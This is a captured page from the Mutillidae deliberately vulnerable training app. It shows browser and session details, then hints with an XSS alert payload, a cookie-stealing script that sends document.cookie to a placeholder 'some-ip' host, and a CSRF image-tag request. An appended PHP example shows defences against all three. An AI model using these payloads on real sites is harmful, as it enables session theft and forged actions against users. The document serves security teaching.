Mutillidae: Born to be Hacked
Version: 2.1.19

Site hacked...err...quality-tested with Samurai WTF, Backtrack, Firefox, Burp-Suite, Netcat, and these Mozilla Add-ons

Developed by Adrian "Irongeek" Crenshaw and Jeremy Druin
Browser Information

Info obtained by PHP
Client IP: 172.10.10.1
Client Hostname: 172.10.10.1
Operating System: ClaudeBot/1.0
User Agent String: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)
Referrer: https://server.vulnapp.id/mutillidae/index.php?do=toggle-hints&page=browser-info.php
Remote Client Port: 44376
WhoIs info for client IP
Cookie showhints: 1
Cookie PHPSESSID: 49c5e042c32d69b8e152d14bbd5786ec

Info obtained by JavaScript (fields): Browser Name, Browser Codename, Browser Version, Cookie Enabled?, Platform, User Agent, CPU Class, System Language, Resolution, Color Depth, Referrer, Plug-Ins

Hints
  • For XSS: XSS is easy stuff. This one shows off both reflected (you see the results instantly) and stored (someone can run across it later in another app that uses the same database). "<script>alert("XSS");</script>" is the classic, but there are far more interesting things you could do which I plan to show in a video later.
  • For some hot cookie stealing action, try something like:
    <script>
      new Image().src="http://some-ip/mutillidae/catch.php?cookie="+encodeURI(document.cookie);
    </script>
  • Check out RSnake's XSS Cheat Sheet for more ways you can encode XSS attacks that may allow you to get around some filters.
  • For CSRF: You can create another page someplace and make a link to an image that is not an image. You can also send someone an HTML email with a link inside. Sending links over HTML-aware instant messaging like Communicator also works. One of the quietest methods is to use HTML injection to poison a web page, thus creating a persistent attack. When a user visits the poisoned page, their browser will reach out to the target page. Using an AJAX request can keep the rogue transaction silent. You could use something like the following:
    <img src="http://localhost/mutillidae/index.php?page=add-to-your-blog.php&input_from_form=hi%20there%20monkeyboy">
    This is the easy way to do CSRF with the GET method. Log in as someone, make your page with the link image someplace else, and then view it. You should now see something new on the comment wall.
  • For Cross Site Request Forgery, a tool like the Social Engineering Toolkit by Dave Kennedy can help.
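The hints above describe three weaknesses of the comment wall: the session cookie is readable from document.cookie, user input is echoed back unencoded (reflected and stored XSS), and a state change is accepted over a plain GET that an <img> tag can trigger (CSRF). The following is an added defensive example, not Mutillidae's own code, showing a hardened comment-wall handler that closes all three; it assumes PHP 7.3 or later and HTTPS, and uses $_SESSION['wall'] as a stand-in for the real database table.

```php
<?php
// Added defensive example, not Mutillidae code. A hardened comment-wall
// handler addressing the three hints: cookie theft via document.cookie,
// stored/reflected XSS, and CSRF via an <img> GET. Assumes PHP >= 7.3 and
// HTTPS; $_SESSION['wall'] is a stand-in for the real database table.

// 1. HttpOnly: new Image().src = ... + document.cookie now sends nothing
//    useful; SameSite=Lax also withholds the cookie on cross-site subrequests.
session_set_cookie_params([
    'httponly' => true, 'secure' => true, 'samesite' => 'Lax',
]);
session_start();

// Per-session CSRF token from a CSPRNG, generated once.
if (empty($_SESSION['csrf_token'])) {
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}

// 2. State changes only via POST with a valid token: the hint's
//    <img src="...?input_from_form=..."> is a GET and is simply ignored.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $sent = (string) ($_POST['csrf_token'] ?? '');
    if (!hash_equals($_SESSION['csrf_token'], $sent)) { // constant-time compare
        http_response_code(403);
        exit('Invalid CSRF token');
    }
    $comment = trim((string) ($_POST['input_from_form'] ?? ''));
    if ($comment !== '') {
        $_SESSION['wall'][] = $comment; // store raw; encode on output
    }
}

// 3. Contextual output encoding: <script>alert("XSS");</script> renders as
//    text whether it arrived in this request (reflected) or from the store.
function esc(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}
?>
<form method="post">
  <input type="hidden" name="csrf_token" value="<?= esc($_SESSION['csrf_token']) ?>">
  <textarea name="input_from_form"></textarea>
  <button type="submit">Post</button>
</form>
<ul>
<?php foreach ($_SESSION['wall'] ?? [] as $c): ?>
  <li><?= esc($c) ?></li>
<?php endforeach; ?>
</ul>
```

With this in place, the cookie-stealing script from the hint receives an empty cookie string, the classic alert payload is displayed literally on the wall, and the forged image request adds nothing because it is neither a POST nor carries the token.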